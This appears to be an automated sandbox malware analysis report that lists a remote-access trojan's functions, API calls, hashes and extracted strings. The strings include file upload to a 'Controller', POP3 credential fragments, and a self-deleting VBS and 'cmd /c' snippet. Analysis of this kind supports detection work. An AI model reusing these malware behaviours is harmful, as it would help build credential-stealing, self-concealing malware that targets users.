                                                                                • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                Function 0040CE34 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0040CE42
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,p54,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                • _wcslen.LIBCMT ref: 0040CF21
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                • _wcslen.LIBCMT ref: 0040D001
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                • CloseHandle.KERNEL32 ref: 0040D068
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open$p54$34
                                                                                • API String ID: 1579085052-2460890452
                                                                                • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                Function 0044F4AD Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 419COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$EnvironmentVariable
                                                                                • String ID: xX4
                                                                                • API String ID: 1464849758-4134912787
                                                                                • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen
                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                • API String ID: 4218353326-3023110444
                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                • FindFirstVolumeW.KERNEL32 ref: 0041C133
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                                                • FindVolumeClose.KERNEL32 ref: 0041C1EC
                                                                                • GetLastError.KERNEL32 ref: 0041C204
                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                • lstrcatW.KERNEL32 ref: 0041C24A
                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                • GetLastError.KERNEL32 ref: 0041C261
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                • String ID: ?
                                                                                • API String ID: 3941738427-1684325040
                                                                                • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen
                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                • API String ID: 4218353326-230879103
                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnumOpen
                                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                • API String ID: 1332880857-3714951968
                                                                                • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                • String ID: Close
                                                                                • API String ID: 1657328048-3535843008
                                                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Info
                                                                                • String ID:
                                                                                • API String ID: 2509303402-0
                                                                                • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                • API String ID: 3086580692-2582957567
                                                                                • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                • _free.LIBCMT ref: 0045137F
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 004513A1
                                                                                • _free.LIBCMT ref: 004513B6
                                                                                • _free.LIBCMT ref: 004513C1
                                                                                • _free.LIBCMT ref: 004513E3
                                                                                • _free.LIBCMT ref: 004513F6
                                                                                • _free.LIBCMT ref: 00451404
                                                                                • _free.LIBCMT ref: 0045140F
                                                                                • _free.LIBCMT ref: 00451447
                                                                                • _free.LIBCMT ref: 0045144E
                                                                                • _free.LIBCMT ref: 0045146B
                                                                                • _free.LIBCMT ref: 00451483
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                • _free.LIBCMT ref: 10007CFB
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 10007D1D
                                                                                • _free.LIBCMT ref: 10007D32
                                                                                • _free.LIBCMT ref: 10007D3D
                                                                                • _free.LIBCMT ref: 10007D5F
                                                                                • _free.LIBCMT ref: 10007D72
                                                                                • _free.LIBCMT ref: 10007D80
                                                                                • _free.LIBCMT ref: 10007D8B
                                                                                • _free.LIBCMT ref: 10007DC3
                                                                                • _free.LIBCMT ref: 10007DCA
                                                                                • _free.LIBCMT ref: 10007DE7
                                                                                • _free.LIBCMT ref: 10007DFF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                • API String ID: 1913171305-3159800282
                                                                                • Opcode ID: e3e484b5cd76b2505acb327b6aa6568c9bcd127ae2857501a4dbcb8fa2f8d716
                                                                                • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                • Opcode Fuzzy Hash: e3e484b5cd76b2505acb327b6aa6568c9bcd127ae2857501a4dbcb8fa2f8d716
                                                                                • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                                • GetFileType.KERNEL32 ref: 00455D82
                                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                • String ID: H
                                                                                • API String ID: 4237864984-2852464175
                                                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: \&G$\&G$`&G
                                                                                • API String ID: 269201875-253610517
                                                                                • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                Function 0040A761 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 163sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
